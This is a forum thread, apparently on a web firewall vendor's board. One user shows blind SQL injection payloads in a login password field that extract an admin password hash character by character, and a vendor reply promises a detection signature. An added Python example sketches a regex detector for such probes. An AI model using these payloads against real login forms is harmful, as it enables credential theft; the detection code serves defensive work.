YYEEEESSSS! I'll do it! (2 hours)

2 replies
eLWAux
Joined: 08/02/2008

name: admin
password: blabla') OR ascii(substring(pwd,1,1))>('50 - (+)
password: blabla') OR ascii(substring(pwd,1,1))<('52 - (+)
password: blabla') OR ascii(substring(pwd,1,1))=('52 - (-)
password: blabla') OR ascii(substring(pwd,1,1))=('51 - 2 (+)
first symbol: 2
blabla') OR ascii(substring(pwd,2,1)).. second symbol ....
etc..
in the end: 37fa265330ad83eaa879efb1e2db6380896cf639
SHA('pwd')=37fa265330ad83eaa879efb1e2db6380896cf639 it's TRUE!!!

YEEEEESSSS!
icq: 354 - 345 - 367

yuli
Joined: 01/30/2008

Hi eLWAux

Thank you for your email!!!

I will add a custom signature for the substring() function, as one that can be used to brute-force database contents. The fix will be available in the next application release.

Thanks again,
Yuli
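
Added example, not part of the original posts and not the product's own signature: one way a detection rule for the probes above could look, flagging queries that compare the character code of a single extracted character and grouping them per source. The query shape, the `users` and `posts` tables, the source addresses and the function names are assumptions made for this sketch.

```python
import re
from collections import defaultdict

# One character pulled out of a value, turned into its code, then compared:
# ascii(substring(<expr>, <pos>, <len>)) <op> ...
PROBE = re.compile(
    r"\b(?:ascii|ord)\s*\(\s*(?:substring|substr|mid)\s*\("
    r"\s*([^,()]+?)\s*,\s*(\d+)\s*,\s*\d+\s*\)\s*\)\s*(<=|>=|<>|!=|=|<|>)",
    re.IGNORECASE,
)

def find_probe(query):
    """Return (expression, position, operator) for a probe, or None."""
    m = PROBE.search(query)
    return (m.group(1).lower(), int(m.group(2)), m.group(3)) if m else None

def probing_sources(events, min_probes=3):
    """Map (source, expression) -> probed positions for sources that sent
    at least min_probes probing queries against the same expression."""
    seen = defaultdict(list)
    for source, query in events:
        hit = find_probe(query)
        if hit:
            seen[(source, hit[0])].append(hit[1])
    return {k: sorted(set(v)) for k, v in seen.items() if len(v) >= min_probes}

# Constructed sample traffic (documentation addresses, assumed query shape).
BASE = "SELECT id FROM users WHERE name='admin' AND pwd=SHA('blabla') OR "
SAMPLE = [
    ("192.0.2.10", BASE + "ascii(substring(pwd,1,1))>('50')"),
    ("192.0.2.10", BASE + "ascii(substring(pwd,1,1))<('52')"),
    ("192.0.2.10", BASE + "ASCII( SUBSTRING(pwd, 2, 1) ) = ('55')"),
    ("198.51.100.7", "SELECT id FROM users WHERE name='bob' AND pwd=SHA('x')"),
    ("198.51.100.7", "SELECT substring(title,1,20) FROM posts"),
]

if __name__ == "__main__":
    for (source, expr), positions in probing_sources(SAMPLE).items():
        print(f"{source}: character probing of {expr!r}, positions {positions}")
```

Matching the comparison of a single character's code, rather than every use of substring(), keeps ordinary queries such as the `posts` lookup out of the alerts.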

enatefox
Joined: 08/21/2008

I registered just to ask: ascii(substring(pwd,1,1))=('51 - 2 (+)

I can't find anything on what's after the '=', what's the function and what is the plus sign doing?
